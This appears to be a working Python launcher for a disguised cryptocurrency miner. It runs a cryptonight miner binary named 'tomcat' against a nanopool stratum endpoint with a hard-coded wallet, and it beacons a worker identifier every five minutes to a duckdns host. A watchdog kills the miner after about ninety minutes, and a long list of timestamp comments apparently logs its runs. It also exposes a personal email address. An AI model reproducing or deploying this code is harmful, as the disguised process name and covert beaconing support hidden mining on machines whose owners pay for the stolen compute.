import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:01.778925
#2018-02-17 17:21:07.058467
#2018-02-17 19:09:05.787710
#2018-02-17 20:57:03.846318
#2018-02-17 22:43:03.975817
#2018-02-18 00:26:05.549059
#2018-02-18 02:17:03.947958
#2018-02-18 04:04:03.322254
#2018-02-18 05:54:04.267511
#2018-02-18 07:45:06.327242
#2018-02-18 09:32:06.217541
#2018-02-18 11:18:06.936886
#2018-02-18 13:04:03.857014
#2018-02-18 14:53:05.416198
#2018-02-18 16:41:05.559858
#2018-02-18 18:30:01.610050
#2018-02-18 20:17:06.827067
#2018-02-18 22:02:03.891519
#2018-02-18 23:51:02.010230
#2018-02-19 01:38:04.832869
#2018-02-19 03:26:05.509771
#2018-02-19 05:11:04.224609
#2018-02-19 06:58:05.896637
#2018-02-19 08:46:01.600959
#2018-02-19 10:34:08.570851
#2018-02-19 12:21:07.392160
#2018-02-19 14:09:07.800023
#2018-02-19 15:59:08.100131
#2018-02-19 17:47:15.027624
#2018-02-19 19:35:06.629047
#2018-02-19 21:22:05.204824
#2018-02-19 23:08:07.284857
#2018-02-20 00:54:06.498114
#2018-02-20 02:43:08.654136
#2018-02-20 04:32:05.263182
#2018-02-20 06:16:08.338856
#2018-02-20 08:01:01.923322
#2018-02-20 09:46:09.824834
#2018-02-20 11:30:01.906678
#2018-02-20 13:18:01.448078
#2018-02-20 15:05:10.403874
#2018-02-20 16:51:09.981231
#2018-02-20 18:38:09.996027
#2018-02-20 20:28:05.753614
#2018-02-20 22:13:07.260979
#2018-02-20 23:53:06.398082
#2018-02-21 01:38:02.110743
#2018-02-21 03:27:04.505620
#2018-02-21 05:14:05.995516
#2018-02-21 07:03:07.918461
#2018-02-21 08:49:06.026389
#2018-02-21 10:37:06.848450
#2018-02-21 12:24:05.766473
#2018-02-21 14:10:06.150184
#2018-02-21 15:55:01.331696
#2018-02-21 17:48:05.485705
#2018-02-21 19:35:01.678753
#2018-02-21 21:22:04.616390
#2018-02-21 23:07:02.192605
#2018-02-22 00:56:07.385414
#2018-02-22 02:43:03.901504
#2018-02-22 04:30:07.557447
#2018-02-22 06:15:09.254176
#2018-02-22 08:01:07.380274
#2018-02-22 09:49:01.383245
#2018-02-22 11:33:08.426631
#2018-02-22 13:19:01.495599
#2018-02-22 15:07:10.252894
#2018-02-22 16:52:07.082034
#2018-02-22 18:40:11.781038
#2018-02-22 20:31:06.160065
#2018-02-22 22:17:04.449000
#2018-02-23 00:04:02.032550
#2018-02-23 01:54:04.051726
#2018-02-23 03:42:02.020414
#2018-02-23 05:26:06.099830
#2018-02-23 07:12:02.144523
#2018-02-23 09:17:03.920387
#2018-02-23 11:24:02.207473
#2018-02-23 13:14:06.744317
#2018-02-23 14:59:06.042541
#2018-02-23 16:49:01.506655
#2018-02-23 18:40:09.240206
#2018-02-23 20:28:01.621453
#2018-02-23 22:15:06.477133
#2018-02-24 00:02:05.445154
#2018-02-24 01:51:07.337406
#2018-02-24 03:39:04.205077
#2018-02-24 05:22:06.884168
#2018-02-24 07:10:08.634554
#2018-02-24 08:57:05.477451
#2018-02-24 10:58:05.171110
#2018-02-24 12:46:05.747548
#2018-02-24 14:35:04.569629
#2018-02-24 16:21:06.988295
#2018-02-24 18:15:06.080353
#2018-02-24 20:01:06.549911
#2018-02-24 21:44:05.939528
#2018-02-25 01:55:03.935366
#2018-02-25 05:41:03.944581
#2018-02-25 11:36:07.102565